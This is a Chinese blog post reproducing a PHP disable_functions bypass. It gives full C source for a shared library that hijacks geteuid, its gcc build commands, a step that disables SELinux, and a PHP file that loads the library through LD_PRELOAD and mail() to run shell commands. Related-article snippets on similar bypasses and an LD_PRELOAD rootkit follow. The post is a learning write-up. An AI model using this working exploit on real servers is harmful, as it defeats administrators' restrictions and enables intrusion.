读《利用环境变量LD_PRELOAD来绕过php disable_function执行系统命令》有感

最新推荐文章于 2023-11-30 11:48:03 发布
最新推荐文章于 2023-11-30 11:48:03 发布
阅读量3k 收藏
点赞数
分类专栏: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/niexinming/article/details/52997496
版权

今天看来一篇文章:http://cb.drops.wiki/wooyun/drops/tips-16054.html

复现了一下,感觉有点坑

我把复现的过程,结果和遇到问题在这里总结一下

我的实验环境是centos7 php 5.4

首先按照要求编译一个so

1.创建一个hehe.c


#include <stdlib.h>
#include <stdio.h>
#include <string.h>

void payload() {
        system("ls /home > /var/www/html/kkkk.txt");
}

int  geteuid() {
if (getenv("LD_PRELOAD") == NULL) { return 0; }
unsetenv("LD_PRELOAD");
payload();
}

然后编译一下

gcc -c -fPIC hehe.c -o hehe
gcc --share hehe -o hehe.so

生成一个hehe.so文件

关闭selinux :setenforce 0

然后写一个test.php文件

<?php
putenv("LD_PRELOAD=/var/www/html/hehe.so");
mail("a@localhost","","","","");
?>

访问,等待了很久才在在网站根目录下生成一个kkkk.txt


虽然是成功生成了kkkk.txt,并且内容也是正确的。

但是有几个问题我搞了一天都没有解决:

1.生成的时候特别慢,特别卡,无论我把机子的性能调整到多高

2.不能用system函数读和删除文件,查看日志发现,路径虽然写对了,但是在日志中发现大量文件不存在或者没有被发现的错误记录,很郁闷,而且错误记录不止一条,有很多,证明mail函数在邮件没有发送成功的时候反复发送,直到一个阀值才停下

3.无法用常规的方式反弹shell出来



niexinming
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
蚁剑的能disable_functions的插件
06-21
蚁剑的能disable_functions的插件,插件无法下载问题
free_checker:使用LD_PRELOAD的简单内存泄漏查找程序(用于C程序)
05-06
**免费检查器(Free Checker)**是一个针对C语言程序的简单内存泄漏检测工具,它巧妙地利用了Linux动态链接器的特性——`LD_PRELOAD`。这个工具的主要目的是帮助程序员定位并解决C语言编程中常见的内存泄漏问题。...
disable_function
qq_51770207的博客
09-22 4057
disable_function
disable_functions过总结
闵行小鱼塘
05-18 1880
总结下disable_functions过的一些方法
简单讲解如何PHP disable_function
h0ld1rs的博客
11-01 4351
前言 在渗透测试中,有时遇到拿到webshell后无法执行命令的情况,为了成功提权,需要我们disable_function disable_function简介 disable_functions是php.ini中的一个设置选项,可以用来设置PHP环境禁止使用某些函数,通常是网站管理员为了安全起见,用来禁用某些危险的命令执行函数等。(eval并非PHP函数,放在disable_functions中是无法禁用的,若要禁用需要用到PHP的扩展Suhosin。) 过方法 1. 寻找未禁用的函数 黑名单
PHP disable_function
goddemon
09-11 476
disable_functions 典型禁用函数 过的几个思路 最基础的两个法 ①寻找没有被禁用的函数 PHP执行命令的函数有-->因此找没有禁用掉的就好了 system,shell_exec,passthru,exec,popen,proc_open,pcntl_exec,mail,putenv,apache_setenv,mb_send_mail,assert,dl,set_time_limit,ignore_user_abort,symlink,link,map_open,imap_m
利用 LD_PRELOAD劫持动态链接库,disable_function
最新发布
qq_68163788的博客
11-30 1274
LD_PRELOAD是一个环境变量,它允许用户在程序加载动态链接库(共享对象)时指定要预先加载的库。这个功能可以用来替换程序中的特定函数,或者添加额外的功能。 使用LD_PRELOAD可以在不修改源代码的情况下,对程序的行为进行修改。这对于调试、性能分析或者添加额外的安全检查非常有用。例如,可以使用LD_PRELOAD来替换标准库中的malloc和free函数,从而实现内存泄漏检测或者统计内存使用情况。 需要注意的是,LD_PRELOAD只对动态链接的程序有效
openredir:通过 LD_PRELOAD 重定向文件打开操作
05-31
解压后,用户可以通过编译源代码来生成所需的动态库,然后设置`LD_PRELOAD`环境变量,指定该库,使文件打开操作被重定向。 总的来说,`openredir`是一个强大的工具,利用`LD_PRELOAD`技术实现了对文件打开操作的...
PRELOAD:LD_PRELOAD rootkit实用程序
05-23
这里的"PRELOAD:LD_PRELOAD rootkit实用程序"是指利用`LD_PRELOAD`环境变量来加载一个自定义的动态链接库(`.so`文件),从而在系统调用层面进行hook或注入代码,实现对目标程序的控制或监控。这在某些情况下可以...
srv-shim:通过LD_PRELOAD getaddrinfoconnect挂钩对旧系统的SRV记录支持
05-15
LD_PRELOAD=target/debug/libsrvshim.so \ curl _my-service._tcp.domain 您还可以在/etc/ld.so.conf创建一个条目,以使它被加载到系统上的所有进程中。 OSX: DYLD_INSERT_LIBRARIES=/abs/path/to/libsrvshim....
LD_PRELOAD劫持、ngixn临时文件、无需临时文件rce、php filter chain构造
十一.的博客
11-28 597
LD_PRELOAD 是linux下的一个环境变量。用于动态链接库的加载,在动态链接库的过程中他的优先级是最高的。类似于 .user.ini 中的 auto_prepend_file,那么我们就可以在自己定义的动态链接库中装入恶意函数。也叫做LD_PRELOAD劫持,流程如下定义与目标函数完全一样的函数,包括名称、变量及类型、返回值及类型等gcc -shared -fPIC 自定义文件.c -o生成的库文件.so通过命令 exportLD_PRELOAD=”库文件路径”,设置要优先替换动态链接库。
php ld preload,利用环境变量LD_PRELOADphp disable_function执行系统命令
weixin_36397146的博客
03-17 358
0x00 前言在做渗透测试的时候如果遇到安全配置比较好的服务器,当你通过各种途径获得一个php类型的webshell后,却发现面对的是无法执行系统命令的尴尬,因为这类服务器针对命令执行函数做了防范措施,后续的渗透行为都因此而止步。笔者这里分享一个过思路,希望你能在实际测试中派上用场。0x02 过思路严苛环境php设置的disable_function如下:dlexecsystempassth...
php 预加载函数,php7.4 preload(预加载)
weixin_29163857的博客
03-11 348
1. 什么是preload什么是preload?Preloading in PHP 7.4中有一句话总结的简单到位:Opcache, but more!那么preload比opcache多做了哪些呢?为了更好的说明问题,我们先来看下面这张opcache的工作原理图。image图中不难看出,对于执行过的代码,再次执行时将命中cache,cache中的opcode可以直接被取出,进而执行。从而省了下了...
LD_PRELOAD劫持
weixin_63231007的博客
12-24 2613
有趣的 LD_PRELOAD
php mail ld preload,深入浅出LD_PRELOAD & putenv()
weixin_35240068的博客
03-25 252
前记上周利用空余时间,做了一下0ctf,感觉这道bypass disable function的题目比较有趣,于是分析一下,有了此文题目分析拿到题目Imagick is a awesome library for hackers to break `disable_functions`.So I installed php-imagick in the server, opened a `back...
利用环境变量LD_PRELOADphp disable_function执行系统命令
weixin_33738982的博客
03-08 915
YiYang · 2016/05/20 15:550x00 前言在做渗透测试的时候如果遇到安全配置比较好的服务器,当你通过各种途径获得一个php类型的webshell后,却发现面对的是无法执行系统命令的尴尬,因为这类服务器针对命令执行函数做了防范措施,后续的渗透行为都因此而止步。笔者这里分享一个过思路,希望你能在实际测试中派上用场。0x02 过思路严苛环境php设置的disable_func...
disable_functions
unexpectedthing的博客
04-28 2287
文章目录前言黑名单利用 LD_PRELOAD 环境变量LD_PRELOAD 简介利用条件劫持 getuid()劫持启动进程演示过程利用ShellShock(CVE-2014-6271)使用条件:原理简述演示过程php-json-bypass使用条件:原理简述利用脚本演示过程php-GC-bypass使用条件:原理简述利用脚本演示过程利用 Backtrace使用条件:原理简述利用脚本利用方法利用 Apache Mod CGI使用条件:原理简述演示过程2020De1CTF通过攻击 PHP-FPM理论:ctf
LD_PRELOAD_32是什么环境变量
07-16
LD_PRELOAD_32是一个环境变量,用于指定在运行32位应用程序时预加载的共享库。它允许用户在运行应用程序之前加载指定的共享库,以覆盖系统默认的库。这样可以在不修改应用程序代码的情况下,通过加载自定义的共享库来修改应用程序的行为。 LD_PRELOAD_32变量的值是一个以冒号分隔的共享库文件名列表。当应用程序启动时,系统会首先加载LD_PRELOAD_32中指定的共享库,然后再加载系统默认的库。这样,应用程序就可以使用预加载的共享库中定义的函数和符号。 LD_PRELOAD_32通常用于调试、性能分析、功能扩展等场景。通过预加载共享库,可以在应用程序运行时注入特定功能或修改函数行为,从而实现一些定制化需求。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值